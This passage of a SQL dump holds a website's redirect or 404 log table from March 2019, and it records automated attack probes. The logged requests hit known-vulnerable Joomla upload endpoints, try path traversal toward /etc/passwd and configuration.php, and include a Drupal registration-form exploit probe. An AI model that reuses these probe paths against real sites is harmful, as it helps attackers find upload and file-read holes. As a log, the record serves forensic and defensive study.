00:00:00',301),(22457,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name/',NULL,'','',1,0,'2019-03-27 13:41:07','0000-00-00 00:00:00',301),(22458,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 22:18:49','0000-00-00 00:00:00',301),(22459,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 22:18:50','0000-00-00 00:00:00',301),(22460,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 22:18:51','0000-00-00 00:00:00',301),(22461,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 22:18:52','0000-00-00 00:00:00',301),(22462,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:18:52','0000-00-00 00:00:00',301),(22463,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:18:52','0000-00-00 00:00:00',301),(22464,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:18:53','0000-00-00 00:00:00',301),(22465,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:18:53','0000-00-00 00:00:00',301),(22466,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:07','0000-00-00 00:00:00',301),(22467,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:08','0000-00-00 00:00:00',301),(22468,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:08','0000-00-00 00:00:00',301),(22469,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:08','0000-00-00 00:00:00',301),(22470,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:09','0000-00-00 00:00:00',301),(22471,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:09','0000-00-00 00:00:00',301),(22472,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:09','0000-00-00 00:00:00',301),(22473,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:19:10','0000-00-00 00:00:00',301),(22474,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 22:19:10','0000-00-00 00:00:00',301),(22475,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 22:19:11','0000-00-00 00:00:00',301),(22476,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 22:19:12','0000-00-00 00:00:00',301),(22477,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 22:19:15','0000-00-00 00:00:00',301),(22478,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 22:19:16','0000-00-00 00:00:00',301),(22479,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewingk-co6phahudxoskhe8icia4chawcmecmew&amp;usg=aovvaw2rlstae_wzh1-vr3ofnhus//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 22:19:16','0000-00-00 00:00:00',301),(22480,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-5',NULL,'','',2,0,'2019-03-27 22:27:29','0000-00-00 00:00:00',301),(22481,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 22:38:58','0000-00-00 00:00:00',301),(22482,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 22:38:59','0000-00-00 00:00:00',301),(22483,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 22:39:00','0000-00-00 00:00:00',301),(22484,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 22:39:00','0000-00-00 00:00:00',301),(22485,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:00','0000-00-00 00:00:00',301),(22486,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:04','0000-00-00 00:00:00',301),(22487,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:04','0000-00-00 00:00:00',301),(22488,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:05','0000-00-00 00:00:00',301),(22489,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:06','0000-00-00 00:00:00',301),(22490,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:06','0000-00-00 00:00:00',301),(22491,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:06','0000-00-00 00:00:00',301),(22492,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:08','0000-00-00 00:00:00',301),(22493,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:09','0000-00-00 00:00:00',301),(22494,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:09','0000-00-00 00:00:00',301),(22495,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:10','0000-00-00 00:00:00',301),(22496,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 22:39:10','0000-00-00 00:00:00',301),(22497,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 22:39:10','0000-00-00 00:00:00',301),(22498,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 22:39:11','0000-00-00 00:00:00',301),(22499,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 22:39:12','0000-00-00 00:00:00',301),(22500,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 22:39:12','0000-00-00 00:00:00',301),(22501,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 22:39:13','0000-00-00 00:00:00',301),(22502,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewixukcdo6phahwemiskhab-dvi4mhawcjobmcq&amp;usg=aovvaw3b9zamuiw_aygexsdccm-c//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 22:39:14','0000-00-00 00:00:00',301),(22503,'http://www.3s-technologies.com.tr/tr/&clkt=281&bg=!kjolk4tep88thchgig0caaaa71iaaabamqgrboujdqtmdi5ksjyhw4mwj3wb4ujqf48pymxpnwqfm8oyqxtd5kut111q3p8pggxpivpprzxdzlozoayc-v40zjdj7qlxzivzqu9yqdsrkw83naw90fbb4oepwbdjdjo-7cdxs0mn8vprsypkhnqperiqjrtywaez3pzajx5knrnzdx2d-gkofcfcjn63pmykwlequwggixptinayjo0u4xf5gniwelftr6ddi9qykqxsi8bmvfwaau4ftdu6fs0qfeagpyawdzcb1pcudrcb2rmcz2gn57nvpux5t7nmq59bb0vfufzpxsnwxciulwdvwfkwzna5n4dpsgrkru4vtr40_uzf95ixiptkidfluttt5tzeiig-yuhglvppo5losmfyg2qqr-pahqj6vlvkiwpyqncepljp65g2ixpxdwsksej_5a7ekjonfd3msstkoh0bguefwumwyfevhuwkv8lba9jth-cnhhrinirtfbnkblyrir84nrsisbt2md4e3pzkeegdiim5p4yg3_m6jpk',NULL,'https://www.google.com/','',1,0,'2019-03-28 15:34:32','0000-00-00 00:00:00',301),(22504,'http://www.3s-technologies.com.tr/tr/images/stories/barner.gif',NULL,'','',1,0,'2019-03-29 05:13:59','0000-00-00 00:00:00',301),(22505,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions//images/stories/barner.gif',NULL,'','',1,0,'2019-03-29 05:14:15','0000-00-00 00:00:00',301),(22506,'http://www.3s-technologies.com.tr/en/wp-content/themes/nuance/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/nuance/style.css','',3,0,'2019-03-29 08:15:32','0000-00-00 00:00:00',301),(22507,'http://3s-technologies.com.tr/tr/components/com_docman/dl2.php?archive=0&file=li4vli4vli4vli4vli4vli4vli4vdgfyz2v0l3d3dy9jb25mawd1cmf0aw9ulnboca==',NULL,'','',1,0,'2019-03-29 08:19:56','0000-00-00 00:00:00',301),(22508,'http://3s-technologies.com.tr/tr/jojo/index.php?file=../../../../../../../../../../etc/passwd&jat3action=gzip&type=css&v=1',NULL,'','',1,0,'2019-03-29 08:20:01','0000-00-00 00:00:00',301),(22509,'http://www.3s-technologies.com.tr//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',5,0,'2019-03-30 21:57:32','0000-00-00 00:00:00',301),(22510,'https://www.3s-technologies.com.tr//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',6,0,'2019-03-30 21:59:09','0000-00-00 00:00:00',301),(22511,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-30 23:26:29','0000-00-00 00:00:00',301),(22512,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:26:31','0000-00-00 00:00:00',301),(22513,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:26:33','0000-00-00 00:00:00',301),(22514,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-30 23:26:33','0000-00-00 00:00:00',301),(22515,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:34','0000-00-00 00:00:00',301),(22516,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:35','0000-00-00 00:00:00',301),(22517,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:36','0000-00-00 00:00:00',301),(22518,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:36','0000-00-00 00:00:00',301),(22519,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:37','0000-00-00 00:00:00',301),(22520,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:38','0000-00-00 00:00:00',301),(22521,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:38','0000-00-00 